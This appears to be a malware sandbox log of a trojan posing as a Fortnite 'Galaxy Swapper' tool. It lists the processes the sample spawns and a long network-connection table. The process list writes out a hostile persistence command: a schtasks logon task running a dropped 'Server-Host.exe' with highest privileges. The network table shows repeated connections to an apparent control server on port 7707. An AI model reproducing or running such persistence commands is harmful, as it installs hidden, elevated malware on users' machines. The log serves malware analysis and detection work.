"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Downloads\document.rtf" /o ""
C:\Users\Admin\Downloads\fortnite Galaxy Swapper.exe
"C:\Users\Admin\Downloads\fortnite Galaxy Swapper.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Server-Host" /tr '"C:\Users\Admin\AppData\Roaming\Server-Host.exe"' & exit
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpEDDD.tmp.bat""
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "Server-Host" /tr '"C:\Users\Admin\AppData\Roaming\Server-Host.exe"'
C:\Windows\SysWOW64\timeout.exe
timeout 3
C:\Users\Admin\AppData\Roaming\Server-Host.exe
"C:\Users\Admin\AppData\Roaming\Server-Host.exe"
C:\Users\Admin\Downloads\fortnite Galaxy Swapper.exe
"C:\Users\Admin\Downloads\fortnite Galaxy Swapper.exe"
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Downloads\document.rtf" /o ""
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Windows\System32\msiexec.exe
"C:\Windows\System32\msiexec.exe"
C:\Users\Admin\Downloads\fortnite Galaxy Swapper.exe
"C:\Users\Admin\Downloads\fortnite Galaxy Swapper.exe"
C:\Users\Admin\Downloads\fortnite Galaxy Swapper.exe
"C:\Users\Admin\Downloads\fortnite Galaxy Swapper.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SDRSVC
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffb3028cc40,0x7ffb3028cc4c,0x7ffb3028cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1908,i,1785483332300146940,18144814345919222627,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=1892 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2188,i,1785483332300146940,18144814345919222627,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2252 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2304,i,1785483332300146940,18144814345919222627,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2352 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3164,i,1785483332300146940,18144814345919222627,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3184 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3308,i,1785483332300146940,18144814345919222627,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3328 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4436,i,1785483332300146940,18144814345919222627,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4448 /prefetch:2
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3736,i,1785483332300146940,18144814345919222627,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4688 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4872,i,1785483332300146940,18144814345919222627,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4700 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4700,i,1785483332300146940,18144814345919222627,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5036 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5320,i,1785483332300146940,18144814345919222627,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5328 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=5348,i,1785483332300146940,18144814345919222627,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5052 /prefetch:1
C:\Users\Admin\Downloads\fortnite Galaxy Swapper - copia.exe
"C:\Users\Admin\Downloads\fortnite Galaxy Swapper - copia.exe"
C:\Users\Admin\Downloads\fortnite Galaxy Swapper - copia.exe
"C:\Users\Admin\Downloads\fortnite Galaxy Swapper - copia.exe"
C:\Users\Admin\Downloads\fortnite Galaxy Swapper - copia.exe
"C:\Users\Admin\Downloads\fortnite Galaxy Swapper - copia.exe"
C:\Users\Admin\Downloads\fortnite Galaxy Swapper - copia.exe
"C:\Users\Admin\Downloads\fortnite Galaxy Swapper - copia.exe"
C:\Users\Admin\Downloads\fortnite Galaxy Swapper - copia.exe
"C:\Users\Admin\Downloads\fortnite Galaxy Swapper - copia.exe"
C:\Users\Admin\Downloads\fortnite Galaxy Swapper - copia.exe
"C:\Users\Admin\Downloads\fortnite Galaxy Swapper - copia.exe"
C:\Users\Admin\Downloads\fortnite Galaxy Swapper - copia.exe
"C:\Users\Admin\Downloads\fortnite Galaxy Swapper - copia.exe"
C:\Users\Admin\Downloads\fortnite Galaxy Swapper.exe
"C:\Users\Admin\Downloads\fortnite Galaxy Swapper.exe"
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Desktop\Final July Report FBI.rtf" /o ""
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | mega.nz | udp |
| LU | 31.216.145.5:443 | mega.nz | tcp |
| LU | 31.216.145.5:443 | mega.nz | tcp |
| US | 8.8.8.8:53 | eu.static.mega.co.nz | udp |
| LU | 66.203.124.37:443 | eu.static.mega.co.nz | tcp |
| LU | 66.203.124.37:443 | eu.static.mega.co.nz | tcp |
| US | 8.8.8.8:53 | 5.145.216.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.api.mega.co.nz | udp |
| US | 8.8.8.8:53 | 37.124.203.66.in-addr.arpa | udp |
| LU | 66.203.125.12:443 | g.api.mega.co.nz | tcp |
| LU | 66.203.125.12:443 | g.api.mega.co.nz | tcp |
| US | 8.8.8.8:53 | 12.125.203.66.in-addr.arpa | udp |
| LU | 66.203.124.37:443 | eu.static.mega.co.nz | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| GB | 2.18.27.82:443 | www.bing.com | tcp |
| GB | 2.18.27.82:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 82.27.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| GB | 2.18.27.76:443 | r.bing.com | tcp |
| GB | 2.18.27.76:443 | r.bing.com | tcp |
| GB | 104.98.2.161:443 | th.bing.com | tcp |
| GB | 104.98.2.161:443 | th.bing.com | tcp |
| US | 8.8.8.8:53 | 76.27.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.2.98.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| US | 8.8.8.8:53 | login.microsoftonline.com | udp |
| US | 8.8.8.8:53 | services.bingapis.com | udp |
| US | 13.107.5.80:443 | services.bingapis.com | tcp |
| US | 8.8.8.8:53 | 80.5.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 172.64.154.167:443 | www2.bing.com | tcp |
| US | 172.64.154.167:443 | www2.bing.com | tcp |
| US | 8.8.8.8:53 | 167.154.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gfs208n164.userstorage.mega.co.nz | udp |
| FR | 185.206.26.74:443 | gfs208n164.userstorage.mega.co.nz | tcp |
| FR | 185.206.26.74:443 | gfs208n164.userstorage.mega.co.nz | tcp |
| FR | 185.206.26.74:443 | gfs208n164.userstorage.mega.co.nz | tcp |
| FR | 185.206.26.74:443 | gfs208n164.userstorage.mega.co.nz | tcp |
| FR | 185.206.26.74:443 | gfs208n164.userstorage.mega.co.nz | tcp |
| FR | 185.206.26.74:443 | gfs208n164.userstorage.mega.co.nz | tcp |
| US | 8.8.8.8:53 | 74.26.206.185.in-addr.arpa | udp |
| GB | 104.98.2.161:443 | th.bing.com | tcp |
| US | 8.8.8.8:53 | testfamilysafety.bing.com | udp |
| US | 204.79.197.201:443 | testfamilysafety.bing.com | tcp |
| US | 8.8.8.8:53 | 201.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | i.pinimg.com | udp |
| GB | 199.232.56.84:443 | i.pinimg.com | tcp |
| US | 8.8.8.8:53 | www.pixelstalk.net | udp |
| US | 8.8.8.8:53 | jooinn.com | udp |
| US | 8.8.8.8:53 | wallpaperaccess.com | udp |
| US | 172.67.210.245:443 | www.pixelstalk.net | tcp |
| US | 172.67.7.204:443 | wallpaperaccess.com | tcp |
| US | 172.67.222.245:443 | jooinn.com | tcp |
| US | 172.64.154.167:443 | www2.bing.com | tcp |
| US | 172.64.154.167:443 | www2.bing.com | tcp |
| US | 8.8.8.8:53 | 84.56.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 245.210.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 204.7.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 245.222.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | wallup.net | udp |
| US | 8.8.8.8:53 | wallpapers.com | udp |
| US | 8.8.8.8:53 | static.vecteezy.com | udp |
| DE | 144.76.39.8:443 | wallup.net | tcp |
| GB | 18.154.84.104:443 | wallpapers.com | tcp |
| GB | 18.154.84.104:443 | wallpapers.com | tcp |
| US | 104.18.4.151:443 | static.vecteezy.com | tcp |
| US | 8.8.8.8:53 | 104.84.154.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 151.4.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.39.76.144.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 61.39.156.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.enjpg.com | udp |
| US | 104.21.1.48:443 | www.enjpg.com | tcp |
| US | 8.8.8.8:53 | 48.1.21.104.in-addr.arpa | udp |
| US | 172.64.154.167:443 | www2.bing.com | tcp |
| US | 172.64.154.167:443 | www2.bing.com | tcp |
| US | 8.8.8.8:53 | aefd.nelreports.net | udp |
| US | 8.8.8.8:53 | a.nel.cloudflare.com | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| GB | 173.222.211.40:443 | aefd.nelreports.net | tcp |
| GB | 173.222.211.40:443 | aefd.nelreports.net | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 8.8.8.8:53 | 1.80.190.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.211.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | wallpapercave.com | udp |
| US | 172.67.29.26:443 | wallpapercave.com | tcp |
| US | 172.67.29.26:443 | wallpapercave.com | tcp |
| US | 172.67.29.26:443 | wallpapercave.com | tcp |
| US | 8.8.8.8:53 | images8.alphacoders.com | udp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| US | 104.20.75.132:443 | images8.alphacoders.com | tcp |
| GB | 2.18.190.81:80 | apps.identrust.com | tcp |
| GB | 2.18.190.81:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | cdn.wallpapersafari.com | udp |
| US | 104.21.72.145:443 | cdn.wallpapersafari.com | tcp |
| US | 8.8.8.8:53 | 26.29.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 132.75.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.72.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | wallpapersafari.com | udp |
| US | 172.67.151.97:80 | wallpapersafari.com | tcp |
| US | 172.67.151.97:80 | wallpapersafari.com | tcp |
| US | 8.8.8.8:53 | mcdn.wallpapersafari.com | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | www.googletagservices.com | udp |
| NL | 142.250.102.155:443 | www.googletagservices.com | tcp |
| NL | 142.250.102.155:443 | www.googletagservices.com | tcp |
| US | 8.8.8.8:53 | static.cloudflareinsights.com | udp |
| US | 104.16.80.73:443 | static.cloudflareinsights.com | tcp |
| US | 8.8.8.8:53 | 97.151.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.102.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.102.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.27.250.142.in-addr.arpa | udp |
| NL | 142.250.102.155:443 | www.googletagservices.com | tcp |
| US | 8.8.8.8:53 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| US | 216.239.34.36:443 | region1.analytics.google.com | tcp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| NL | 142.250.27.100:443 | fundingchoicesmessages.google.com | tcp |
| US | 8.8.8.8:53 | 73.80.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.34.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 94.102.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.27.250.142.in-addr.arpa | udp |
| NL | 142.250.27.100:443 | fundingchoicesmessages.google.com | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | p4-ehphv4rdhic72-vimgueom6mxvyyyd-if-v6exp3-v4.metric.gstatic.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| NL | 142.250.102.132:443 | tpc.googlesyndication.com | tcp |
| NL | 142.250.102.132:443 | tpc.googlesyndication.com | tcp |
| NL | 142.250.102.132:443 | tpc.googlesyndication.com | tcp |
| NL | 142.250.102.132:443 | tpc.googlesyndication.com | tcp |
| NL | 142.250.102.132:443 | tpc.googlesyndication.com | tcp |
| US | 8.8.8.8:53 | 95.27.250.142.in-addr.arpa | udp |
| NL | 142.250.27.106:443 | www.google.com | tcp |
| US | 216.239.34.36:443 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | 132.102.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 94.27.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.27.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ads.eu.criteo.com | udp |
| NL | 178.250.1.17:443 | ads.eu.criteo.com | tcp |
| US | 8.8.8.8:53 | rtb.nl3.eu.criteo.com | udp |
| NL | 178.250.1.10:443 | rtb.nl3.eu.criteo.com | tcp |
| US | 8.8.8.8:53 | static.criteo.net | udp |
| US | 8.8.8.8:53 | cat.nl3.eu.criteo.com | udp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| NL | 178.250.1.3:443 | static.criteo.net | tcp |
| NL | 178.250.1.3:443 | static.criteo.net | tcp |
| NL | 178.250.1.3:443 | static.criteo.net | tcp |
| NL | 178.250.1.3:443 | static.criteo.net | tcp |
| NL | 178.250.1.3:443 | static.criteo.net | tcp |
| NL | 178.250.1.6:443 | cat.nl3.eu.criteo.com | tcp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | tcp |
| US | 8.8.8.8:53 | imageproxy.eu.criteo.net | udp |
| US | 8.8.8.8:53 | csm.eu.criteo.net | udp |
| NL | 178.250.1.15:443 | imageproxy.eu.criteo.net | tcp |
| NL | 178.250.1.15:443 | imageproxy.eu.criteo.net | tcp |
| NL | 178.250.1.15:443 | imageproxy.eu.criteo.net | tcp |
| NL | 178.250.1.25:443 | csm.eu.criteo.net | tcp |
| US | 8.8.8.8:53 | 17.1.250.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.1.250.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.1.250.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.25.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.1.250.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.1.250.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.1.250.178.in-addr.arpa | udp |
| US | 172.67.151.97:443 | mcdn.wallpapersafari.com | tcp |
| NL | 142.250.102.132:443 | tpc.googlesyndication.com | udp |
| NL | 142.250.27.106:443 | www.google.com | udp |
| US | 8.8.8.8:53 | ep1.adtrafficquality.google | udp |
| NL | 142.250.27.154:443 | ep1.adtrafficquality.google | tcp |
| US | 8.8.8.8:53 | 154.27.250.142.in-addr.arpa | udp |
| US | 104.16.80.73:443 | static.cloudflareinsights.com | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| GB | 173.222.211.40:443 | aefd.nelreports.net | udp |
| US | 104.16.80.73:443 | static.cloudflareinsights.com | tcp |
| US | 8.8.8.8:53 | get-license4.com | udp |
| US | 104.21.21.238:443 | get-license4.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| NL | 142.250.27.94:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | 238.21.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | hit-8841.com | udp |
| US | 172.67.180.25:80 | hit-8841.com | tcp |
| US | 8.8.8.8:53 | 25.180.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | back-kurwa.com | udp |
| US | 172.67.172.104:80 | back-kurwa.com | tcp |
| US | 172.67.172.104:443 | back-kurwa.com | tcp |
| US | 8.8.8.8:53 | two-root.com | udp |
| US | 172.67.169.37:443 | two-root.com | tcp |
| US | 8.8.8.8:53 | 104.172.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.169.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pick-pick.com | udp |
| US | 172.67.218.156:443 | pick-pick.com | tcp |
| NL | 45.156.25.126:80 | 45.156.25.126 | tcp |
| US | 8.8.8.8:53 | 156.218.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.25.156.45.in-addr.arpa | udp |
| US | 216.239.34.36:443 | region1.analytics.google.com | udp |
| GB | 92.123.142.104:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 104.142.123.92.in-addr.arpa | udp |
| GB | 95.101.129.216:443 | www.bing.com | tcp |
| GB | 95.101.129.216:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 216.129.101.95.in-addr.arpa | udp |
| GB | 95.101.129.216:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| GB | 95.101.129.233:443 | th.bing.com | tcp |
| GB | 95.101.129.233:443 | th.bing.com | tcp |
| GB | 95.101.129.146:443 | th.bing.com | tcp |
| GB | 95.101.129.146:443 | th.bing.com | tcp |
| US | 8.8.8.8:53 | 233.129.101.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.129.101.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bazaar.abuse.ch | udp |
| US | 151.101.194.49:443 | bazaar.abuse.ch | tcp |
| US | 151.101.194.49:443 | bazaar.abuse.ch | tcp |
| US | 8.8.8.8:53 | 49.194.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.20.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| NL | 142.250.27.105:443 | www.google.com | udp |
| NL | 142.250.27.105:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 105.27.250.142.in-addr.arpa | udp |
| GB | 95.101.129.233:443 | th.bing.com | udp |
| US | 8.8.8.8:53 | fpt.microsoft.com | udp |
| US | 52.167.30.171:443 | fpt.microsoft.com | tcp |
| NL | 142.250.27.105:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 171.30.167.52.in-addr.arpa | udp |
| NL | 142.250.27.105:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | fpt2.microsoft.com | udp |
| US | 172.64.154.167:443 | www2.bing.com | tcp |
| US | 172.64.154.167:443 | www2.bing.com | tcp |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.173.79.40.in-addr.arpa | udp |
| NL | 45.90.13.137:7707 | tcp | |
| US | 8.8.8.8:53 | 137.13.90.45.in-addr.arpa | udp |
| NL | 45.90.13.137:7707 | tcp | |
| NL | 45.90.13.137:7707 | tcp | |
| NL | 45.90.13.137:7707 | tcp | |
| NL | 45.90.13.137:7707 | tcp | |
| NL | 45.90.13.137:7707 | tcp | |
| US | 8.8.8.8:53 | 91.65.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | metadata.templates.cdn.office.net | udp |
| GB | 92.123.26.202:443 | metadata.templates.cdn.office.net | tcp |
| US | 8.8.8.8:53 | binaries.templates.cdn.office.net | udp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| US | 8.8.8.8:53 | 202.26.123.92.in-addr.arpa | udp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.57:443 | binaries.templates.cdn.office.net | tcp |
| US | 8.8.8.8:53 | odc.officeapps.live.com | udp |
| GB | 52.109.28.48:443 | odc.officeapps.live.com | tcp |
| US | 8.8.8.8:53 | 57.211.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.28.109.52.in-addr.arpa | udp |
| NL | 45.90.13.137:7707 | tcp | |
| NL | 45.90.13.137:7707 | tcp | |
| NL | 45.90.13.137:7707 | tcp | |
| NL | 45.90.13.137:7707 | tcp | |
| NL | 45.90.13.137:7707 | tcp | |
| NL | 45.90.13.137:7707 | tcp | |
| NL | 45.90.13.137:7707 | tcp | |
| NL | 45.90.13.137:7707 | tcp | |
| NL | 45.90.13.137:7707 | tcp | |
| NL | 142.250.27.105:443 | www.google.com | udp |
| NL | 142.250.27.105:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | jspm.dev | udp |
| US | 205.234.175.175:443 | jspm.dev | tcp |
| US | 8.8.8.8:53 | blockchain.info | udp |
| US | 104.16.236.243:443 | blockchain.info | tcp |
| US | 8.8.8.8:53 | 175.175.234.205.in-addr.arpa | udp |
| US | 8.8.8.8:53 | blockstream.info | udp |
| US | 35.201.74.156:443 | blockstream.info | tcp |
| US | 8.8.8.8:53 | 243.236.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| NL | 142.250.102.138:443 | clients2.google.com | udp |
